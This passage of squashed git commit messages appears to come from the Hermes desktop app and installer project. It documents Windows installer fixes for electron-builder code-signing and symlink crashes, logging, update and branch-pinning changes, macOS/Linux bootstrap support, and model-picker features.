detection heuristic and refuse to launch without elevation.
Also declares PerMonitorV2 DPI + UTF-8 active code page + Common
Controls v6.
Limitations of this initial version:
* No code signing -- Windows SmartScreen will warn once on Hermes-Setup.exe
('More info -> Run anyway'). The downstream binaries it produces
(Hermes.exe in win-unpacked/, the hermes CLI) are locally-built and
therefore don't carry MOTW, so they launch without SmartScreen
intervention. Cert procurement tracked separately.
* macOS and Linux build paths defined but untested -- Windows-only V1.
* fix(installer): pass -IncludeDesktop to manifest, surface launch errors, alias hermes desktop
Three bugs found in the first VM end-to-end test:
1. install.ps1 -Manifest was called WITHOUT -IncludeDesktop, so the
manifest came back with the 14-stage list (no desktop stage), the
UI showed '14 steps' and Stage-Desktop never ran. Pass the flag to
both the manifest fetch and the per-stage runs — install.ps1 gates
the desktop stage's inclusion on the flag.
2. The Success screen's Launch button silently swallowed the Tauri
error when no Hermes.exe existed (e.g. Stage-Desktop was skipped).
Wire the error through to inline UI with an alert callout, so the
user gets actionable text ('Hermes.exe missing, run hermes desktop
from a terminal') instead of an unresponsive button.
3. The Success screen tells users to run 'hermes desktop' from a
terminal but the CLI only accepted 'hermes gui' — invalid choice
for 'desktop'. Rename the subcommand canonically to 'desktop' with
'gui' as a backwards-compatible alias. Update the _SUBCOMMANDS sets
used by session-flag arg parsing + logging-mode probe so both names
route to the same logic.
* fix(install.ps1): pre-warm electron-builder winCodeSign cache + fix Stage-Desktop $HasNode false-skip
Two bugs caught in the second VM end-to-end run:
1. electron-builder's winCodeSign extraction fails on grandma-class
Windows boxes because the .7z archive contains macOS symlinks
(darwin/10.12/lib/libcrypto.dylib and libssl.dylib pointing at
versioned siblings). Creating symlinks on Windows requires
SeCreateSymbolicLinkPrivilege, a per-user right that non-admin
accounts don't have on stock Windows. Result: every fresh install
on a non-admin user fails Stage-Desktop with a 7-Zip 'cannot create
symbolic link' error, retried four times, then bails.
Fix: Initialize-ElectronBuilderCache pre-extracts winCodeSign-2.6.0.7z
ourselves with -snl (don't preserve symlinks, store as resolved file
content) AND -x!darwin (skip the entire macOS subtree — irrelevant
on Windows). Writes to electron-builder's expected cache dir before
electron-builder gets a chance to try its own broken extraction.
Idempotent — fast-paths via signtool.exe sentinel check.
2. Install-Desktop's first guard was 'if (-not $HasNode) skip'.
$HasNode is set by Stage-Node into $script:HasNode, but in
cross-process driver mode (each -Stage NAME is a fresh powershell.exe
spawned by Hermes-Setup.exe), that script-scope variable from the
PREVIOUS process is invisible — so the guard always fired and
Install-Desktop returned in 900ms with a misleading
'Node.js not available' reason. The real npm probe below it never
got to run. Fix: re-probe npm directly via Get-Command when $HasNode
is empty/false, since by that point Stage-Node has already verified
Node is installed and the only question is whether *this* process
can see it on PATH (it can — installer-wide PATH update from Stage-Node).
* fix(install.ps1): tell electron-builder we're NOT signing instead of pre-extracting winCodeSign
The previous commit (c7e46f9f3) worked around the winCodeSign-symlinks-
on-Windows extraction crash by pre-extracting the archive ourselves with
-snl + -x!darwin. That fix was correct but addressed the wrong layer.
The deeper question: why was electron-builder fetching winCodeSign at all
when we have no signing cert configured? Answer: electron-builder
unconditionally pre-warms the toolchain assuming any build MIGHT sign.
The cert auto-discovery never finds anything (we never set CSC_LINK
or anything else), so the signing never happens — but the 100MB fetch
of winCodeSign and its broken-on-Windows symlink extraction does.
Set CSC_IDENTITY_AUTO_DISCOVERY=false (with WIN_CSC_LINK and
WIN_CSC_KEY_PASSWORD also explicitly cleared as belt-and-suspenders)
before invoking npm run pack, and electron-builder skips the entire
winCodeSign apparatus. No download, no extraction, no privilege check.
Env vars are saved/restored around the invocation so we don't leak
the override into Stage-PlatformSdks etc.
Net: removes the 100-line Initialize-ElectronBuilderCache helper that
manually downloaded + extracted winCodeSign-2.6.0.7z. Replaced with
3 env-var assignments. The produced Hermes.exe is functionally
identical — just no longer carries a code-signing-machinery dependency
we never used.
* fix(installer): bump bootstrap-installer.log to capture stage transitions + every install.ps1 line
Diagnosing the second VM failure was impossible because bootstrap-installer.log
contained only the 'starting' banner. Two causes:
1. emit_log() inside run_bootstrap() was tracing::debug! — dropped on the
floor under the default INFO env-filter.
2. The per-stage sink callbacks (on_stdout_line / on_stderr_line) only
emitted Tauri events to the frontend; they never tee'd to the log file
at all. When the failure route mounts, the Tauri event stream is the
only place the script output lived, and it gets discarded.
3. The Failed / Stage / Manifest / Complete lifecycle frames in emit_event()
were also Tauri-only — so even the 'which stage failed' frame never
reached the log.
Fixes:
* emit_log() → tracing::info!
* Sink callbacks tee stdout to info!, stderr to warn!, with stage label
as a structured field for grep'ability
* emit_event() now matches on the variant and logs each lifecycle frame
at the right level: Failed → tracing::error!, others → info!
Result: a failing install leaves a complete forensic trail in
bootstrap-installer.log — manifest stage list, every install.ps1
stdout/stderr line tagged by stage, the stage transitions, and the
final error. Same path as before so nothing the user does changes.
* fix(install.ps1): Stage-NodeDeps cross-process $HasNode + stream npm install output to bootstrap log
VM run 3 diagnosis: node-deps stage skipped on the VM (logged
'Skipping Node.js dependencies (Node not installed)') and then
desktop's npm install failed with exit 1 and zero diagnostic detail.
Two root causes:
1. $HasNode false-skip in Stage-NodeDeps — same cross-process bug
pattern we fixed for Stage-Desktop in c7e46f9f3. Stage-Node ran
in process A and set $script:HasNode = $true, then exited. Stage-
NodeDeps ran in fresh process B (Hermes-Setup.exe -Stage NAME
spawns each stage independently), where that variable doesn't
exist. Re-probe via Get-Command npm instead of trusting the
stale script-scope global. The previous stage already verified
Node so the re-probe succeeds.
2. npm install --silent + Tee to TEMP file hid the real error.
When the workspace install failed on the VM, the actual reason
was buffered in $env:TEMP\hermes-npm-desktop-install-*.log and
the user saw only 'exit 1'. Drop --silent so npm streams its
full output, drop the TEMP-file dance — the Tauri installer's
streaming sink already tees every stdout/stderr line to the
rolling bootstrap-installer.log, so a side log file is dead
weight that hides the very error we need.
After this, the bootstrap log on a failure will contain npm's full
output (deprecation warnings, ETARGET, native-module compile errors,
whatever) tagged with stage=desktop, making the actual cause
diagnosable instead of an opaque exit code.
* fix(install.ps1): restore Initialize-ElectronBuilderCache (CSC env vars alone aren't enough)
VM run 4 diagnosis: even with CSC_IDENTITY_AUTO_DISCOVERY=false set,
electron-builder still fetches winCodeSign and signs bundled binaries.
The log shows the signing happens BEFORE the cache extraction:
• signing with signtool.exe ...\winpty-agent.exe
• signing with signtool.exe ...\OpenConsole.exe
• downloading winCodeSign-2.6.0.7z
• <symlink privilege error>
Cause: node-pty's bundled prebuilds are listed in apps/desktop's
asarUnpack ['**/*.node', '**/prebuilds/**']. electron-builder
re-signs anything unpacked from asar, regardless of whether OUR
binary gets signed. The signtool invocation needs winCodeSign on
disk, which needs the .7z extracted, which hits the macOS-symlink
crash on non-admin Windows.
The CSC env vars I added in d5fe46727 only kill IDENTITY DISCOVERY
(so OUR Hermes.exe stays unsigned, which is fine — we have no cert).
They don't prevent the toolchain fetch for the bundled-prebuild
re-sign. I removed the pre-extract in d5fe46727 thinking the env
vars subsumed it; that was wrong. Both are needed.
Restoring Initialize-ElectronBuilderCache verbatim from c7e46f9f3
and keeping the CSC env vars. Wrote a clearer doc-comment at the
call site explaining the two-knob interaction so future maintainers
don't drop one half again.
* fix(desktop): disable signtool via signtoolOptions.sign=null, drop dead winCodeSign pre-extract
VM run 5 diagnosis: the pre-extract from 3b29e65c1 ran (extracted 83
files, 24MB) but produced ZERO files at the expected sentinel path
'/winCodeSign-2.6.0/windows-10/x64/signtool.exe'.
Cause: the .7z archive's root entries are 'windows-10/', 'darwin/',
'linux/', etc. — not 'winCodeSign-2.6.0/<arch>'. Extracting with
'-o$cacheRoot' put files at $cacheRoot/windows-10/..., NOT at
$cacheRoot/winCodeSign-2.6.0/windows-10/.... I had the directory
nesting wrong from the start.
And then we observed: electron-builder downloads winCodeSign-2.6.0.7z
under a random numeric filename ('384387955.7z') regardless of what's
already extracted in the parent dir. The cache key isn't the dirname;
it's content-addressed. So the pre-extract approach was doomed even
if the path nesting had been right.
Actual fix: signtoolOptions.sign=null in apps/desktop/package.json's
win build config. electron-builder honors this and skips the bundled-
prebuild signing entirely — no signtool invocation, no winCodeSign
fetch, no symlink-privilege crash. The previous failures all stemmed
from electron-builder pre-signing node-pty's bundled .exes
(winpty-agent.exe, OpenConsole.exe) which are already author-signed
upstream; re-signing with our nonexistent cert was overwriting good
sigs with nothing useful anyway.
Cost: when we DO get a real cert later, we'll add it back with the
sign function pointing at the cert chain. Until then, all-null is
the correct config and unblocks every non-admin Windows user.
Removed Initialize-ElectronBuilderCache (the dead pre-extract).
Removed the call site. Kept the CSC_IDENTITY_AUTO_DISCOVERY env
vars as belt-and-suspenders against a future electron-builder
change that might revive cert auto-discovery.
* fix(desktop): use no-op sign function instead of sign=null
VM run 6 still hit the symlink crash even with signtoolOptions.sign=null.
electron-builder 26.8.1 treats null as 'use the default signtool path'
rather than 'skip signing', so the winCodeSign fetch + extraction still
fired for the bundled prebuild re-sign.
The Electron docs (electronjs.org/docs/latest/tutorial/code-signing)
make it clear signing is OPTIONAL and unsigned apps work fine — users
just see SmartScreen on first launch. The electron-builder mechanism
for 'don't actually sign anything' is to supply a custom sign function
(via signtoolOptions.sign: '<path-to-cjs-module>') that resolves
without invoking signtool.
build-noop-sign.cjs is that module — a 5-line async function that
returns undefined. electron-builder calls it for every binary it would
have signed, gets back a resolved promise, and considers each binary
'signed.' No signtool spawn, no winCodeSign fetch, no symlink crash.
When Nous's cert arrives, replace this file with a real signing hook
(@electron/windows-sign-based or a direct signtool invocation). The
architecture's signing-ready and the cutover is a one-file edit.
* fix(desktop): signAndEditExecutable=false to skip signtool path entirely
After reading app-builder-lib/winPackager.js line 216 + 231 directly:
signAndEditExecutable is the ACTUAL hardcoded gate that short-circuits
both signApp() (which signs Hermes.exe + every shouldSignFile match
including bundled prebuilds) AND createTransformerForExtraFiles().
None of signtoolOptions.sign / sign:null / sign:<custom-fn> gate the
winCodeSign download — that happens before they're consulted.
What we lose: rcedit also runs through signAndEditResources, so
disabling this drops PE metadata (file properties showing 'Hermes' /
'Nous Research' / file description). Cost is real but bounded:
* Hermes.exe filename, icon, asar contents, app identity intact
* Task Manager shows 'Hermes.exe' (the filename) not 'Hermes' (PE
description) — minor downgrade
* Start menu, taskbar, window title all work normally
* SmartScreen will warn once (unsigned, same as before)
When the cert lands, flip signAndEditExecutable back to default true,
both signing AND rcedit return, PE metadata is restored.
Removes the no-op sign function (build-noop-sign.cjs) since
signAndEditExecutable=false prevents signtool from being invoked at
all — the custom hook never gets called either.
* feat(install.ps1): write .hermes-bootstrap-complete marker at end of install
The desktop app's main.cjs resolver ladder has a 'bootstrap-needed' rung
that fires when .hermes-bootstrap-complete is missing from
ACTIVE_HERMES_ROOT. Pre-Hermes-Setup, this marker was written by the
packaged-desktop's own bootstrap-runner.cjs at the end of its install
flow. Now that Hermes-Setup.exe runs install.ps1 directly, install.ps1
needs to own the marker — otherwise the desktop sees no marker on first
launch and triggers its legacy first-launch bootstrap (re-running
install.ps1 from inside Electron, the exact recursion Hermes-Setup.exe
was supposed to obviate).
Implementation:
* New Stage-BootstrapMarker (worker) → Write-BootstrapMarker (helper)
* Slotted in the manifest right after platform-sdks, before the
interactive configure/gateway stages, so it runs unconditionally
when the install reaches the finalize phase
* Schema mirrors apps/desktop/electron/main.cjs writeBootstrapMarker /
isBootstrapComplete EXACTLY: {schemaVersion: 1, pinnedCommit,
pinnedBranch, completedAt}. Schema version stays at 1 so old
desktops that read marker files written by future install.ps1s
can still parse them.
* pinnedCommit comes from -Commit flag (Hermes-Setup.exe passes it)
or falls back to 'git rev-parse HEAD' in InstallDir
* pinnedBranch from -Branch flag, defaults to 'main' matching
install.ps1's own param default
Two PS-5.1 gotchas baked into comments:
* The ?. null-conditional operator doesn't exist pre-PS7; use
explicit if-checks on Get-Command results
* Set-Content -Encoding UTF8 emits a BOM in 5.1 and Node's plain
JSON.parse rejects BOM — write via .NET's UTF8Encoding(false)
to produce BOM-less JSON the desktop's readJson() can parse
* feat(installer): drive in-app updates through the Tauri installer
Converge update on the same principle as bootstrap: one driver owns all
repo mutation. The desktop becomes a pure consumer that hands off to
Hermes-Setup.exe --update instead of re-implementing git/pip in Electron.
- hermes desktop --build-only: build without launching, so the installer
owns the post-update launch (CLI keeps build logic single-sourced).
- Installer AppMode {Install,Update} from argv; get_mode exposed to the UI.
- Installer self-copies to HERMES_HOME/hermes-setup.exe on install success
(no-op guard during --update re-invocation to avoid the locked-exe copy).
- Installer --update flow (update.rs): wait for the desktop to release the
venv shim, run 'hermes update --yes --gateway' (branch on exit 0/2/other),
then 'hermes desktop --build-only', then launch the rebuilt desktop. Reuses
the bootstrap event channel + progress UI via a synthetic two-stage manifest.
- Desktop applyUpdates() gutted (~105 lines of git/stash/pull/pyproject/pip
removed) -> thin handoff: spawn updater, app.quit() to free the shim.
Detection (checkUpdates, commit changelog, behind-count) kept intact.
- install.ps1 creates Start Menu + Desktop shortcuts to the packed Hermes.exe
(never bare 'hermes desktop', which would rebuild every launch).
* test update
* fix(installer): pass --branch to hermes update in the --update flow
The install is a detached-HEAD checkout of a pinned commit. Without
--branch, 'hermes update' fell back to its default (main) and switched
the checkout to main — a divergent branch that lacks the desktop CLI
command — so the update targeted the wrong branch and the rebuild stage
failed with 'invalid choice: desktop'.
Thread BUILD_PIN_BRANCH (the branch this installer was built against,
and the same branch the desktop detected the update on) into
'hermes update --branch <b>' so update + rebuild stay on-branch.
* test update
* fix(installer): stamp Hermes icon onto Hermes.exe via rcedit (no winCodeSign)
The unpacked Hermes.exe showed the stock Electron icon + name in the
taskbar because build.win.signAndEditExecutable=false disables BOTH
electron-builder's signing AND its rcedit metadata/icon stamping. That
flag is load-bearing: enabling it re-triggers signtool -> winCodeSign,
whose macOS symlinks crash 7-Zip on non-admin Windows (unfixable dead end).
Decouple identity-stamping from signing entirely: after npm run pack,
run rcedit ourselves on the produced exe.
- Add rcedit as a direct devDependency of apps/desktop (the transitive
electron-winstaller copy is fragile).
- apps/desktop/scripts/set-exe-identity.cjs: Node helper that calls
rcedit's named export to set icon + ProductName/FileDescription/
CompanyName. Node builds argv natively — avoids the PowerShell->exe
->JSON double-escaping that broke the app-builder rcedit path.
- install.ps1 Set-DesktopExeIdentity invokes the script after the build,
before shortcuts. Best-effort: failure keeps the stock icon, never
fails the install. rcedit is a pure PE editor — no signtool, no
winCodeSign, no symlinks.
Verified locally: stamping a copy of the built Hermes.exe embeds the
32x32 icon and sets ProductName=Hermes.
Also fix update-path success-screen flash: in update mode the installer
hands off + exits in ~600ms, so don't route to the 'launch Hermes'
success view (it flashed before the window closed).
* update test
* fix(desktop): show 'hermes update' guidance for CLI installs instead of dead-end error
A user who installed via the CLI (irm|iex / install.sh) then ran
`hermes desktop` has no staged hermes-setup.exe, so clicking Update
in-app hit resolveUpdaterBinary()=null and showed a misleading error
('re-run the Hermes installer') with a Try-again button that could
never succeed — a dead loop for a perfectly valid install.
Treat the no-updater case as an intentional outcome, not a failure:
- main.cjs applyUpdates returns { ok:true, manual:true, command:'hermes update' }
(no throw, no 'error' stage) when no updater binary exists.
- New 'manual' update stage + apply-state.command thread the command to the UI.
- updates-overlay ManualView: a polished terminal-native card with the
exact command and a copy button, framed as the correct path for a CLI
user rather than an error.
GUI-installer users are unaffected — hermes-setup.exe present => seamless
auto-update runs as before. Zero new process orchestration; can't fail
the update demo.
* update test
* fix(gui): pin /api/hermes/update to the current branch
The desktop command-center 'update' action hits POST /api/hermes/update,
which spawned bare `hermes update` with no --branch. cmd_update then
falls back to its default (main) and checks the working tree OUT of the
tracked branch — a bb/gui install silently jumped to main and lost the
desktop CLI.
Resolve the checkout's current branch and pass --branch <current> from
this endpoint only. The engine default (main) is DELIBERATELY unchanged:
bare `hermes update` from a terminal, the gateway /update bot command,
and the CLI/TUI relaunch path all keep their long-standing 'update against
main' contract for the existing user base. Only the GUI button is scoped
to update-the-branch-you're-on. Detached HEAD / git failure falls back to
the bare default.
* update test
* fix(desktop): branch-pin the CLI manual-update command card
The 'Update from your terminal' card (shown to CLI installs with no staged
updater) hardcoded bare `hermes update` — which defaults to main and would
switch a bb/gui (or any non-main) checkout off-branch. Same bug we fixed for
the GUI button, leaked into the card's copy text.
Resolve the checkout's current branch and show `hermes update --branch
<current>` for non-main checkouts; keep it bare for main so the card stays
clean. Best-effort: bare fallback if branch detection fails. Matches the
GUI button + installer --update contract; bare terminal/bot/TUI update
paths still default to main, unchanged.
* docs: phragg was here
* feat(desktop): lead onboarding with Nous Portal + fix fresh-install detection (#34970)
- Feature Nous Portal as the primary onboarding card (Recommended tag,
app logo, single pitch line); collapse other OAuth providers behind an
"Other providers" disclosure whose open/closed state persists.
- Surface OpenRouter as a one-click API-key option inside the disclosure;
move "I have an API key" to a quiet bottom-right link.
- Treat "no provider configured" as a normal onboarding state, not a red
error banner (provider-setup-errors copy match).
- Fix setup.runtime_check: it reported ready when the resolved runtime had
an empty credential or only implicit Bedrock/IAM, so fresh installs never
saw onboarding. Now requires a usable credential.
- Auto-wire Windows fonts for WSL2 users so the renderer renders real
Segoe UI instead of the DejaVu fallback; make WSL detection env-independent
via the /proc kernel marker.
* feat(desktop): live elapsed timer on install bootstrap steps
The first-launch install overlay showed a static "Installing" with no
motion, so long steps (notably the repo clone) looked frozen. Stamp each
stage's start time on the running transition and tick once a second so the
active step shows live elapsed (e.g. "Installing · 1:23"), plus elapsed on
the overall current-step line. Completed steps keep their final duration.
* fix(desktop): resolve PortableGit for update checks + reserve titlebar tools space
- runGit() hardcoded spawn('git'), which ENOENTs on fresh installer-driven
Windows installs (git is PortableGit under %LOCALAPPDATA%\hermes\git, never
on PATH) — so "Check for updates" failed with "Couldn't check for updates".
Add resolveGitBinary() mirroring findGitBash (PortableGit → Git-for-Windows
→ PATH) and use it in runGit.
- PageSearchShell rendered a full-width search input in the titlebar row, so
on Windows its right edge slid under the fixed top-right tools + native
window controls. Reserve that footprint via --titlebar-tools-* vars.
* fix(desktop): stop streaming caret from shifting layout on completion
The streaming caret (::after on the running message's last child) was an
in-flow inline-block adding ~0.78em of inline width, which could wrap the
last line mid-stream; when the caret is removed on completion the line
un-wraps and reflows — the visible post-response layout shift. Net-zero its
inline advance with a compensating negative margin so it paints at the text
end without consuming layout width.
* fix(desktop): stop completed-message layout shift while streaming
The assistant message action bar used `hideWhenRunning`, which unmounts it
whenever the thread is streaming. Since the bar reserves vertical space in
each completed assistant message's footer (it's invisible-until-hover via
opacity, not via mount), unmounting it collapsed every prior turn by the
bar's height — then remounting on resolve grew them back, shifting the whole
conversation (visible as "padding appears above the last user message").
Drop hideWhenRunning so the footer height is constant; the bar stays
invisible during streaming via its existing opacity/pointer-events gating.
* fix(merge): keep windows-footgun suppressions inline
* fix(merge): keep remaining gateway footgun suppressions inline
* fix(merge): restore contracts caught by main-target CI
* fix(dashboard): honor injected HERMES_DASHBOARD_SESSION_TOKEN
The desktop shell mints a session token and signs its /api + /api/ws
calls with it via HERMES_DASHBOARD_SESSION_TOKEN, but the main-merge
restored a web_server.py that ignored the env var and minted its own
random _SESSION_TOKEN -- so every desktop request 401'd and the UI
reported "gateway offline". Read the injected token (fall back to a
fresh random one) so loopback HTTP + WS auth line up.
Adds a regression test so a future merge can't silently drop the read.
* fix(desktop): align fresh-install home so upgraders don't brick
Two related first-launch bugs on machines with a legacy ~/.hermes:
- install.ps1 hardcoded $HermesHome/$InstallDir to %LOCALAPPDATA%\hermes
and ignored the HERMES_HOME the desktop passes through. The desktop
freezes HERMES_HOME at module load and prefers a legacy ~/.hermes when
%LOCALAPPDATA%\hermes is absent, so the installer wrote to a different
home than the shell read -> "Could not connect to Hermes gateway". Honor
$env:HERMES_HOME in the param defaults.
- isBootstrapComplete() trusted the marker + checkout without verifying a
runnable venv, so an interrupted/split install spawned a dead backend
instead of re-bootstrapping. Also require the venv python to exist.
* fix(dashboard): allow packaged desktop file:// origin on loopback WS
The packaged Electron desktop loads its renderer over file://, so its
/api/ws handshake carries Origin: file:// (or null). The DNS-rebinding
WebSocket Origin guard only accepted http(s) origins matching the bound
host, so it rejected the desktop's own renderer with 4403 -> "Could not
connect to Hermes gateway" on macOS.
A browser DNS-rebinding attacker can only ever present an http(s) origin
(the site hosting the malicious page); it cannot forge file://, null, or
a custom app scheme AND hold the loopback session token. So on loopback
binds we now trust non-web origins -- the token in _ws_auth_ok remains
the real authenticator. Public/gated binds still reject them, and
cross-site http(s) origins are still rejected everywhere.
* fix(desktop): resolve renderer assets relative to BASE_URL
Absolute public asset paths (/apple-touch-icon.png, /ds-assets/...) work
under the dev server but break in the packaged app, where the renderer is
loaded from file://.../index.html and a leading slash resolves to the
filesystem root -> broken onboarding provider icon and backdrop image on
macOS. Prefix these with import.meta.env.BASE_URL so they resolve next to
the bundled index.html in both dev and packaged builds.
* feat(desktop): automate first-launch bootstrap on macOS/Linux
Previously a packaged macOS/Linux app with no Hermes install hit a
dead-end ("first-launch install is not yet automated -- run install.sh
manually") because install.sh lacked the staged protocol install.ps1
exposes. Now both platforms bootstrap on first launch with the same
structured, per-step progress UI as Windows.
- install.sh: add --manifest / --stage / --json / --non-interactive plus
a stage dispatcher (prerequisites, repository, venv, python-deps,
node-deps, path, config, setup, gateway, complete). User-input stages
(setup, gateway) are skipped under --non-interactive; the in-app
onboarding overlay owns API keys/model, matching the Windows flow.
Each stage runs inside the install dir (its own process) and a new
--commit flag pins the checkout to the build-stamp SHA.
- bootstrap-runner.cjs: drive the staged manifest/stage/JSON protocol for
both install.ps1 (PowerShell) and install.sh (bash), selected by
installer kind; removed the single-blob POSIX shim.
- main.cjs: drop the macOS/Linux unsupported-platform dead-end so the
bootstrap-needed path runs the installer on every platform.
* fix(dashboard): return 404 JSON for unmatched /api paths instead of SPA HTML
The SPA catch-all (serve_spa) served index.html for any unmatched GET,
including unregistered /api/* endpoints. A missing API route therefore
came back as <!doctype html> with status 200, and JSON clients (the
desktop app's fetchJson) crashed with an opaque
'SyntaxError: Unexpected token <' instead of a clear error.
- web_server.py: unmatched /api or /api/... now returns 404 JSON
('No such API endpoint'); non-api paths still serve the SPA for
client-side routing.
- main.cjs fetchJson: detect an HTML body / text/html content-type on a
2xx response and reject with a clear message naming the URL, rather
than a raw JSON.parse SyntaxError. Empty bodies resolve to null;
malformed JSON reports the URL plus a snippet.
* say 'OS appearance' instead of 'macOS appearance'
* feat(install): add --include-desktop stage + PowerShell-style flags to install.sh
Brings install.sh to parity with install.ps1's bootstrap surface so the
shared Rust/Tauri bootstrapper (apps/bootstrap-installer) can drive a
macOS/Linux install the same way it drives Windows.
- Accept the PowerShell-style aliases the bootstrapper emits to both
installers: -Commit / -Branch (alongside existing -Manifest / -Stage /
-Json / -NonInteractive).
- Add --include-desktop / -IncludeDesktop. When set, the manifest gains a
'desktop' stage (immediately before 'complete'), and a new install_desktop
runs a root workspace `npm install` + `npm run pack` (electron-builder
--dir, signing auto-discovery disabled) to produce release/mac*/Hermes.app
-- mirroring install.ps1's Install-Desktop / Stage-Desktop.
- The flag is opt-in, exactly like Windows: the signed bootstrap installer
passes it; the Electron app's own first-launch bootstrap and the CLI
one-liner omit it (building the desktop from inside the running app would
clobber it).
* fix: tts endpoints
* macOS desktop: install + in-app self-update (#35607)
* fix(installer): align macOS HERMES_HOME with the rest of the stack
paths.rs computed the macOS Hermes home as ~/Library/Application Support/
hermes, but nothing else does: hermes_constants.get_hermes_home() (Python),
scripts/install.sh, and the Electron desktop's resolveHermesHome() all use
~/.hermes on macOS. The drift meant the Tauri installer wrote the install to
one directory and the desktop looked for it in another, so a fresh GUI
install never found its backend (the file's own comment warned this exact
drift would break things). Use ~/.hermes on macOS to match.
* fix(install.sh): always emit a stage result frame on failure
Stage helpers (clone_repo, install_deps, check_python, …) were written for
the monolithic flow and call `exit 1` on failure. Under `--stage`, that
terminated the process before the JSON result frame was printed, so the
installer's parse_stage_result saw "no frame" instead of a clean
{ok:false,...} contract response. Run the stage body in a subshell so an
`exit` only unwinds the subshell and the parent still emits the frame.
* feat(install.sh): auto-provision git on macOS/Linux (parity with install.ps1)
install.ps1 downloads PortableGit on Windows, but install.sh just printed a
"please install git" hint and exited — so a fresh Mac with no developer tools
(no Xcode CLT → no git) couldn't get past the clone step. check_git now tries
to install git before bailing:
- macOS: Homebrew if present (headless), else `xcode-select --install`
(the CLT prompt also provides the compiler some wheels need), polling for
git to appear.
- Linux: apt/dnf/pacman via sudo when available.
Falls back to the manual instructions only if auto-provision fails.
* feat(desktop): in-app GUI+backend self-update on macOS/Linux
On Windows the staged Hermes-Setup binary drives updates (quit → hermes
update → hermes desktop --build-only → relaunch). The mac drag-install has no
such binary, so "Update now" previously just printed `hermes update`.
Since there's no venv-shim file lock on POSIX, the desktop can drive the whole
update itself. applyUpdates now, when no staged updater exists on mac/linux:
1. runs `hermes update --yes [--branch <current>]` (backend git pull + deps),
2. runs `hermes desktop --build-only` (OS-aware GUI rebuild) with the
Hermes-managed Node + venv on PATH,
3. spawns a detached swapper that waits for this process to exit, dittos the
freshly built Hermes.app over the running bundle, clears quarantine, and
relaunches.
Degrades to "backend updated — restart to load the new GUI" if the rebuild
fails or there's no .app bundle to swap (dev run, Linux AppImage).
* chore: uptick
* chore: uptick
* chore: linux build
* fix(install): detect xcode-select git stub on fresh macOS
* chore: bump
* fix(desktop): repair voice dictation on Windows
Voice dictation was broken on Windows in two ways:
1. Mic access was denied. The Electron permission request handler only
granted 'media' requests whose details.mediaTypes included 'audio',
but Chromium on Windows frequently fires the mic request with an empty
mediaTypes array, so getUserMedia threw NotAllowedError. The handler
now grants audio-capture when mediaTypes includes 'audio' OR is
empty/absent, handles the 'audioCapture' permission name, and adds a
setPermissionCheckHandler (the synchronous path Chromium also consults
for getUserMedia on Windows). Video is still denied.
2. Transcripts went nowhere. The composer's insertText handler (used by
dictation and other inserts) only updated the assistant-ui composer
store via setText, never the contentEditable editor DOM. The
draft->editor sync effect only re-renders the editor when it is NOT
focused, and dictation runs while the editor has/regains focus, so the
transcript was stored but never shown and could not be sent. insertText
now renders into the editor DOM and places the caret, mirroring
appendExternalText.
Also hardens fetchJson: a 2xx response with an HTML body (or text/html
content-type) now rejects with a clear message naming the URL instead of
an opaque JSON.parse 'Unexpected token <' error.
* feat(desktop): route Nous subscribers onto the Tool Gateway from the GUI
When the GUI sets the main provider to Nous via POST /api/model/set, call
the same apply_nous_managed_defaults the CLI uses after model selection, so
GUI/onboarding users land on the Nous Tool Gateway the same way CLI users do
— no separate prompt, no duplicated logic.
Purely additive: apply_nous_managed_defaults skips any tool where the user
has a direct key (FIRECRAWL_API_KEY, FAL_KEY, etc.) or explicit config, so it
never overwrites a user's own setup. Only unconfigured tools get routed.
- web_server.py: in set_model_assignment (scope=main, provider=nous), resolve
enabled toolsets and apply managed defaults; guarded so a Portal hiccup never
blocks saving the model. Returns routed tools as gateway_tools.
- onboarding.ts: surface a 'Tool Gateway enabled' toast listing routed tools.
- types/hermes.ts: add gateway_tools to ModelAssignmentResponse.
- tests: cover nous-applies, non-nous-skips, and failure-doesnt-block-save.
* feat(desktop): mirror hermes model free/paid curation in GUI onboarding
GUI onboarding picked models[0] from /api/model/options, which ignores the
Nous free/paid tier — a free user could land on a paid default (e.g.
anthropic/claude-opus-4). Now the recommended default mirrors what `hermes
model` does.
- web_server.py: new GET /api/model/recommended-default?provider=<slug>. For
Nous it runs the same curation as the CLI (get_curated_nous_model_ids +
pricing + check_nous_free_tier + union_with_portal_{free,paid}_recommendations
+ partition_nous_models_by_tier) so free users get a free model and paid users
get the curated default. Other providers fall back to the first curated model.
Never 500s — returns empty model on error so onboarding degrades gracefully.
- hermes.ts: getRecommendedDefaultModel client + RecommendedDefaultModel type.
- onboarding.ts: fetchProviderDefaultModel prefers the recommended endpoint,
falls back to models[0] when unavailable.
- tests: free-tier picks free model, paid-tier picks curated default, failure
returns empty without 500.
* feat(desktop): show model pricing + free/paid tier gating in GUI picker
The CLI `hermes model` picker shows per-model $/Mtok pricing and gates paid
models on free Nous accounts. The GUI picker showed bare model names. Bring it
to parity across both the model-picker dialog and onboarding confirm card.
Backend:
- inventory.build_models_payload gains a pricing=True flag → _apply_pricing
enriches each provider row with formatted per-model pricing
({input,output,cache,free}) via the same _format_price_per_mtok the CLI uses,
and for Nous adds free_tier + unavailable_models (paid models a free user
can't select) via check_nous_free_tier + partition_nous_models_by_tier.
Best-effort: any pricing/tier failure is swallowed and fails open (no gating).
- /api/model/options and TUI model.options now pass pricing=True so the
global picker and in-session picker both carry pricing.
Frontend:
- ModelOptionProvider gains pricing/free_tier/unavailable_models; new
ModelPricing type.
- model-picker dialog renders In/Out $/Mtok (or a Free pill) per model, a
Free tier/Pro badge on the Nous heading, and disables + grays unavailable
paid models for free users with a 'Pro models need a paid subscription' note.
- onboarding confirm card shows the chosen model's price + tier badge.
Tests: test_inventory_pricing covers price formatting, free-tier gating,
paid no-gating, providers without pricing, and swallowed failures.
* fix(desktop): GUI model picker shows curated Nous list in curated order
Two bugs made the GUI Nous model list diverge from the `hermes model` CLI picker:
1. Backend (model_switch.py): the Nous row in list_authenticated_providers
fell through to cached_provider_model_ids("nous"), dumping the full live
/v1/models catalog (~50 vendor-prefixed models, alphabetical). Now it uses
the curated list AND applies the Portal free/paid recommendation union —
exactly like _model_flow_nous in main.py — so newly-launched models such as
stepfun/step-3.7-flash:free surface in curated order. Best-effort: falls
back to the curated list alone if the Portal fetch fails.
2. Frontend (model-picker.tsx): cmdk's Command had shouldFilter on (default),
which re-sorts items by fuzzy-match score (≈alphabetical) and ignores array
order. Set shouldFilter={false} + own the search term and do an
order-preserving substring filter, so the backend's curated order is shown
verbatim.
* feat(desktop): add/switch providers from the model picker via onboarding reuse
The model picker could only select models from already-authenticated
